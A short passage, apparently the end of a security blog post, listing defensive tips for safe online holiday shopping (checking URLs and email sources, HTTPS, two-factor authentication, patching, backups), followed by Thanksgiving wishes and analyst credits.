  • Inspect the source of emails with shopping deals

  • Ensure HTTPS/secure connections to online retailers and Banking sites

  • Check the authenticity of the URL or website address before clicking on a link

  • Stay away from e-mailed invoices - this is often a social engineering technique used by cybercriminals

  • Do not use insecure public WiFi for shopping

  • Use two-factor authentication whenever possible especially on sensitive accounts such as those used for banking

  • Always ensure that your Operating System and Web Browser have the latest security patches installed

  • Use browser add-ons like Adblock Plus to block popups and potential malvertisements

  • Backup your documents and media files


Wishing you all a very Happy Thanksgiving and don’t spend too much!

Credit for analysis: Rubin Azad, Uday Pratap Singh